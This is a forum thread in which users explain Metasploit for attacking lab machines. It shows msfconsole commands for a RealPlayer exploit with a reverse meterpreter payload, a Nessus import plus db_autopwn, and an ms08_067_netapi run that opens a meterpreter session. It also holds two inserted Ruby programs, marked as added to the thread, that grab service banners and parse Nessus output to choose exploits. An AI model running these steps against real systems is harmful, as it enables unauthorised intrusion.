sector-xero

Metasploit Framework Help

7 posts in this topic

Hey guys, first and foremost, I hope you guys are having a nice Thanksgiving this year.

I would like to ask if any of you guys have any nice online tutorials on Metasploit. Exclude links from Irongeek and Metasploit Unleashed, because I've already been examining them.

Do you have any easy-to-digest tutorials out there?

I am trying to exploit a virtual XP SP2 box from a virtual BT|4 box.

Do you guys use the command line or the GUI? I find them both confusing.

I haven't used the GUI myself. I find the module descriptions on the main site pretty helpful. As an example, here's what they say about a RealPlayer exploit:


$ msfconsole

[msfconsole ASCII-art banner]

msf > use exploit/windows/browser/realplayer_smil
msf exploit(realplayer_smil) > show payloads
msf exploit(realplayer_smil) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(realplayer_smil) > set LHOST [MY IP ADDRESS]
msf exploit(realplayer_smil) > exploit

Looks pretty simple. Just remember: RHOST is what you want to attack, LHOST is you, and you don't have to set that all the time, only when you use exploits that depend on it. PAYLOAD is the buffer-overflow payload when you use such exploits. From there, things are pretty well explained by their descriptions.

Edited by SigFLUP

I believe there is an actual manual that comes with Metasploit. You can also look through the code, which can be a pain in the ass since it's so modularized, or use the help functionality within Metasploit itself.

So I'm just going to ask: how do you find out that a system is exploitable?

So far, from what I've learned, it is by doing different types of verbose Nmap scans, which will sometimes give you the service that is running.

Are there other ways you scan a system to see if it is vulnerable?

There are automated systems out there. I don't really use them myself, so I'm unaware of the recent ones. SATAN is one, for instance, but that's pretty old. More often than not, people choose an exploit and then search for hosts that are vulnerable. There are some version-finding modules for Metasploit, which is nice for finding out what versions people are running so that you can ascertain what may or may not be exploitable. It's always a challenge, right? Telnet to your host's services and see if there's version information in its answer; do things like that. I know there's a pauldotcom.com episode where they talk specifically about automated vulnerability detection, I don't know which one though. Best of luck, mate.

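To make the "telnet to the service and read its answer" advice above concrete, here is an added example that is not part of the thread and not Metasploit code: a small Ruby banner grabber with a deadline (so a port that accepts but never speaks does not hang the scan), a fingerprint table that pulls product and version out of the greeting, and a version comparison against a cut-off you would read off the chosen exploit's own description, which is the "pick the exploit, then hunt for hosts" workflow SigFLUP describes. The pattern table, the sample banners and the '1.3.1' cut-off in the demo are constructed for illustration and are not advisory data; the target is a loopback stand-in service, so nothing here touches a real host.

```ruby
require 'socket'

# Connect to host:port, optionally send a probe, and return whatever the service
# says before it goes quiet (nil if the port is closed, unreachable or silent).
def grab_banner(host, port, probe: nil, wait: 3)
  Socket.tcp(host, port, connect_timeout: wait) do |sock|
    sock.write(probe) if probe
    data = +''
    loop do
      # First read gets the full deadline; once something arrived, stop after a short lull.
      break unless IO.select([sock], nil, nil, data.empty? ? wait : 0.5)
      begin
        data << sock.readpartial(4096)
      rescue EOFError
        break
      end
      break if data.bytesize >= 4096
    end
    data.empty? ? nil : data
  end
rescue Errno::ECONNREFUSED, Errno::ETIMEDOUT, Errno::EHOSTUNREACH, SocketError
  nil
end

# Greeting patterns; capture group 1 is the version. Constructed table, extend per target.
BANNER_PATTERNS = [
  ['OpenSSH',  /SSH-[\d.]+-OpenSSH_([\w.]+)/],
  ['ProFTPD',  /ProFTPD ([\d.]+)/],
  ['Sendmail', /ESMTP Sendmail ([\d.]+)/],
].freeze

def fingerprint(banner)
  return nil if banner.nil? || banner.empty?
  BANNER_PATTERNS.each do |product, re|
    m = re.match(banner)
    return { product: product, version: m[1] } if m
  end
  { product: 'unknown', version: nil, banner: banner.strip }
end

# Compare numeric fields only: "4.7p1" -> [4, 7, 1], "4.8" -> [4, 8]. Good enough for a
# first cut; distro backports and patch levels need the exploit's notes, not this.
def version_lt?(a, b)
  pa, pb = [a, b].map { |v| v.scan(/\d+/).map(&:to_i) }
  n = [pa.size, pb.size].max
  pa += [0] * (n - pa.size)
  pb += [0] * (n - pb.size)
  (pa <=> pb) < 0
end

# Is this fingerprint the named product at a version below the one the exploit's
# description says was fixed? The caller supplies that cut-off from the module text.
def older_than?(fp, product, fixed_version)
  return false unless fp && fp[:product] == product && fp[:version]
  version_lt?(fp[:version], fixed_version)
end

# Loopback stand-in for a target: accept one connection, send the constructed
# banner, hang up. Returns the ephemeral port it listens on.
def fake_service(banner)
  server = TCPServer.new('127.0.0.1', 0)
  Thread.new do
    client = server.accept
    client.write(banner)
    client.close
    server.close
  end
  server.addr[1]
end

# Constructed greetings, not captured from real systems.
SAMPLE_BANNERS = [
  "220 ProFTPD 1.3.0 Server (Debian) [::ffff:192.0.2.10]\r\n",
  "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\r\n",
  "220 mail.example.test ESMTP Sendmail 8.13.8/8.13.8; Thu, 26 Nov 2009 15:33:20 -0800\r\n",
].freeze

# Grab and fingerprint each sample banner from its own loopback stand-in.
def demo
  SAMPLE_BANNERS.map do |banner|
    port = fake_service(banner)
    fingerprint(grab_banner('127.0.0.1', port))
  end
end

if $PROGRAM_NAME == __FILE__
  demo.each do |fp|
    # '1.3.1' is a placeholder cut-off for the demo, not a real advisory value.
    puts "#{fp[:product]} #{fp[:version]}  ProFTPD older than 1.3.1? #{older_than?(fp, 'ProFTPD', '1.3.1')}"
  end
end
```

Against a real target you would call grab_banner with the host and port from your Nmap output and, for services that wait for the client to speak first (HTTP, for instance), pass a probe such as a HEAD request; the fingerprint table and cut-off are whatever the exploit you have picked tells you to look for.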

For finding vulnerabilities I would check out Nessus or SAINT.

What's cool about using Nessus is that you can load an exported Nessus scan right into Metasploit, making the process much more automated.

autopwn using an exported NBE Nessus scan file against a Windows 2000 Server pansy box:


msf > db_create
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > db_import_nessus_nbe /root/nessus1026.nbe
msf > db_services
[*] Time: 2009-11-26 15:33:20 -0800 Service: host=192.168.1.107 port=139 proto=tcp state=up name=netbios-ssn
[snip]
[*] Time: 2009-11-26 15:33:23 -0800 Service: host=192.168.1.107 port=135 proto=udp state=up name=epmap
msf > db_vulns
[*] Time: 2009-11-26 15:33:20 -0800 Vuln: host=192.168.1.107 port=139 proto=tcp name=NSS-11011 refs=
[snip]
[*] Time: 2009-11-26 15:33:25 -0800 Vuln: host=192.168.1.107 port=445 proto=tcp name=NSS-11110 refs=CVE-2002-0724,BID-5556,OSVDB-2074
msf > db_autopwn -p -t -e

A more manual exploit against a Windows 2000 Server pansy box:


msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.107
RHOST => 192.168.1.107
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.112
LHOST => 192.168.1.112
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 Service Pack 0 - 4 - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Triggering the vulnerability...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.112:46190 -> 192.168.1.107:4444)

meterpreter >

Edited by rocky
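As an added example (my code, not Metasploit's), here is a stripped-down reader for the NBE file that db_import_nessus_nbe consumes above. It shows where the db_services and db_vulns rows in rocky's transcript come from: one `results` row per plugin hit, service name, port and protocol parsed out of the fourth field, the vuln named NSS-<plugin id>, and CVE/BID/OSVDB refs scraped out of the plugin output. It also shows why `db_autopwn -p` (match on open port) can select an exploit that `-x` (match on vulnerability reference) would not. The field layout is my reading of the NBE format, the sample rows are constructed around the host and plugin ids in the post rather than copied from a real scan, and the two-entry module table is a toy (the ms08_067_netapi / CVE-2008-4250 and ms03_026_dcom / CVE-2003-0352 pairings are real; the port lists and everything else are illustrative).

```ruby
# Rows in a Nessus .nbe export are pipe-separated; the ones that matter look like
#   results|<subnet>|<host>|<name (port/proto)>|<plugin id>|<severity>|<plugin output>
# with newlines inside the plugin output escaped as the two characters \ n.
# Constructed sample built around the host and plugin ids from the post above.
CONSTRUCTED_NBE = <<~'NBE'
  timestamps|||scan_start|Thu Nov 26 15:30:01 2009|
  timestamps|192.168.1|192.168.1.107|host_start|Thu Nov 26 15:30:02 2009|
  results|192.168.1|192.168.1.107|netbios-ssn (139/tcp)|11011|Security Note|An SMB server is running on this port.\n
  results|192.168.1|192.168.1.107|epmap (135/udp)|10736|Security Note|A DCE endpoint mapper is listening here.\n
  results|192.168.1|192.168.1.107|general/tcp|19506|Security Note|Information about this scan.\n
  results|192.168.1|192.168.1.107|microsoft-ds (445/tcp)|11110|Security Hole|Synopsis :\n\nThe remote host is affected by a known SMB issue.\n\nCVE : CVE-2002-0724\nBID : 5556\nOther references : OSVDB:2074\n
  timestamps|192.168.1|192.168.1.107|host_end|Thu Nov 26 15:33:25 2009|
NBE

# "netbios-ssn (139/tcp)" -> name, port, proto. Host-level rows like "general/tcp" do not match.
SERVICE_RE = /\A([^(]+)\((\d+)\/([^)]+)\)\z/

# Pull the CVE / BID / "Other references" lines out of plugin output, in the
# CVE-..., BID-..., OSVDB-... spelling that db_vulns prints.
def extract_refs(output)
  refs = []
  if (m = output.match(/^CVE : (.*)$/))
    m[1].split(',').each { |c| refs << 'CVE-' + c.strip.sub(/\AC(VE|AN)-/, '') }
  end
  if (m = output.match(/^BID : (.*)$/))
    m[1].split(',').each { |b| refs << 'BID-' + b.strip }
  end
  if (m = output.match(/^Other references : (.*)$/))
    m[1].split(',').each do |r|
      src, id = r.strip.split(':', 2)
      refs << "#{src}-#{id}" if id
    end
  end
  refs
end

# One pass over the file: every results row with a real port yields a service
# record (deduplicated per host/port/proto) and a vuln record named NSS-<plugin id>.
def parse_nbe(text)
  services = {}
  vulns = []
  text.each_line do |line|
    f = line.chomp.split('|', 7)  # limit 7 so pipes inside the plugin output survive
    next unless f[0] == 'results' && f.size >= 6
    host, svc, plugin, severity = f[2], f[3], f[4], f[5]
    output = (f[6] || '').gsub('\n', "\n")  # undo the NBE newline escaping
    m = SERVICE_RE.match(svc.strip)
    next unless m  # host-level rows carry no port; this example simply skips them
    name, port, proto = m[1].strip, m[2].to_i, m[3].downcase
    services["#{host}:#{port}/#{proto}"] ||= { host: host, port: port, proto: proto, name: name }
    vulns << { host: host, port: port, proto: proto, name: "NSS-#{plugin}",
               severity: severity, refs: extract_refs(output) }
  end
  { services: services.values, vulns: vulns }
end

# Render records the way db_services / db_vulns print them (minus the timestamp).
def db_lines(db)
  db[:services].map { |s| "Service: host=#{s[:host]} port=#{s[:port]} proto=#{s[:proto]} state=up name=#{s[:name]}" } +
    db[:vulns].map { |v| "Vuln: host=#{v[:host]} port=#{v[:port]} proto=#{v[:proto]} name=#{v[:name]} refs=#{v[:refs].join(',')}" }
end

# Toy module index for the -p vs -x point. The CVE pairings are real; the port
# lists are illustrative and the table is nothing like the full module tree.
MODULES = {
  'exploit/windows/smb/ms08_067_netapi'  => { ports: [139, 445], refs: ['CVE-2008-4250'] },
  'exploit/windows/dcerpc/ms03_026_dcom' => { ports: [135],      refs: ['CVE-2003-0352'] },
}.freeze

# by: :port mimics db_autopwn -p (any module whose port is open over TCP: broad, and
# how -p can pick ms08_067 against a box whose scan flagged a different CVE).
# by: :ref mimics -x (module and scan share a reference: narrow; empty here, since the
# scan reported no ref these two modules claim).
def autopwn_candidates(db, by:)
  MODULES.select do |_name, mod|
    case by
    when :port then db[:services].any? { |s| s[:proto] == 'tcp' && mod[:ports].include?(s[:port]) }
    when :ref  then db[:vulns].any? { |v| (v[:refs] & mod[:refs]).any? }
    else raise ArgumentError, 'by: must be :port or :ref'
    end
  end.keys
end

if $PROGRAM_NAME == __FILE__
  db = parse_nbe(CONSTRUCTED_NBE)
  puts db_lines(db)
  puts "-p would try: #{autopwn_candidates(db, by: :port).inspect}"
  puts "-x would try: #{autopwn_candidates(db, by: :ref).inspect}"
end
```

Note that the 135/udp row from the scan never matches the 135/tcp module here, which is the kind of detail that decides whether `-p` fires a module at a port or not; the same goes for `-x`, which is only as good as the refs Nessus wrote into the plugin output.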
